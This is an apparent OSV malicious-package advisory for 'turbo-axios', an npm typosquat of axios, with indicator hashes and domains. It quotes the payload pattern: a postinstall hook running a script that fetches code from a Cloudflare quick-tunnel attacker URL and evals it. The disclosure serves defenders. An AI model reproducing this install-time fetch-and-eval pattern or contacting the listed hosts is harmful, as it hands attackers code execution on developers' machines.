MAL-2026-4695
See a problem?- Import Source
- https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/turbo-axios/MAL-2026-4695.json
- JSON Data
- https://api.osv.dev/v1/vulns/MAL-2026-4695
- Published
- 2026-05-23T15:53:39Z
- Modified
- 2026-05-26T06:02:59.475877603Z
- Summary
- Malicious code in turbo-axios (npm)
- Details
-
-= Per source details. Do not edit below this line.=-
Source: amazon-inspector (62503451ade68043379968f3dc4784fdb66424d55422854514e3ba1b10058324)
turbo-axios is a typosquat of the popular axios HTTP client (it re-exports the full axios API and reuses axios's repository/homepage metadata in package.json) carrying an install-time remote code execution payload. package.json declares
"postinstall": "node./lib/core/eval.js". lib/core/eval.js performsfetch('https://consequences-faces-weblogs-clinical.trycloudflare.com/download/datab1')and thenawait eval((async () => {\n${datab2}\n})();), executing the response body as JavaScript inside an async IIFE. The destination is an anonymous, mutable Cloudflare quick-tunnel — not the publisher's infrastructure — and the fetched bytes are not pinned, hashed, or otherwise verified, so the attacker can ship arbitrary code to every installer at any time. The exfil/RCE function is misleadingly namedsendAnalytics. Anynpm install turbo-axiosresults in attacker-controlled code execution on the installer's machine with the privileges of the npm process. - Database specific
{ "malicious-packages-origins": [ { "import_time": "2026-05-26T05:52:25.548235993Z", "sha256": "62503451ade68043379968f3dc4784fdb66424d55422854514e3ba1b10058324", "id": "IN-MAL-2026-004349", "source": "amazon-inspector", "modified_time": "2026-05-23T15:53:39Z", "versions": [ "1.17.2" ] }, { "import_time": "2026-05-26T05:52:27.098050827Z", "sha256": "9d7a284fd6c939193711d8b2892a48375e0d0d1e75022dd2c33799a0df3dd4c8", "source": "amazon-inspector", "id": "IN-MAL-2026-004362", "modified_time": "2026-05-23T16:19:11Z", "versions": [ "1.17.3" ] }, { "import_time": "2026-05-26T05:52:25.678412603Z", "sha256": "e2a0231d72ca5ebe4597aab01d0bae4a95762789e9be835b563639acea93ceb5", "id": "IN-MAL-2026-004350", "source": "amazon-inspector", "modified_time": "2026-05-23T15:53:40Z", "versions": [ "1.17.2" ] }, { "import_time": "2026-05-26T05:52:26.893283628Z", "sha256": "f6942a85f7291a7da9e7f27d5502a81308758330fddb9b9e2ad6299a0404bb15", "source": "amazon-inspector", "id": "IN-MAL-2026-004360", "modified_time": "2026-05-23T16:14:27Z", "versions": [ "1.17.3" ] } ] }- References
- Credits
-
-
- Amazon Inspector - FINDER
-
Affected packages
npm / turbo-axios
Package
- Name
- turbo-axios
- View open source insights on deps.dev
- Purl
- pkg:npm/turbo-axios
Database specific
cwes
[
{
"cweId": "CWE-506",
"name": "Embedded Malicious Code",
"description": "The product contains code that appears to be malicious in nature."
},
{
"cweId": "CWE-506",
"name": "Embedded Malicious Code",
"description": "The product contains code that appears to be malicious in nature."
}
]
indicators
{
"package_integrity": [
{
"hashes": {
"sha512_sri": "sha512-LluR+Xr/hcuvo6stjwKCseXKUFx6zqfwbHwMMU6DiWbshT6GqyHU0id1Cl++2P7Tv/ugi3TJewlNFOwOO1tRNQ==",
"sha1": "98b0b5dc911586a4a736c0145157748f2707c4a9"
},
"filename": "turbo-axios-1.17.2.tgz"
}
],
"evidence_files": [
{
"sha256": "584dccb79cebc15dc680287617ce7534b6b9860a4b956c0bf5398145c6e08d0d",
"tlsh": "c401d2991abb29235b3992d49e1b140bf3a17a031680e3c9f78883994fb9940c5428ee",
"path": "lib/core/eval.js"
},
{
"sha256": "cf0961ab23bb2e46e5aea0da5b3f7d6195c76d7f401d1f4f9e7775568eb16b39",
"tlsh": "ccd1ec73c9ca4d572fb47aa8a87a9264f231c30fa551c90fb17e024c4f7572f129762a",
"path": "package.json"
}
],
"domains": [
"philosophy-moms-incoming-milton.trycloudflare.com"
]
}
source
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/turbo-axios/MAL-2026-4695.json"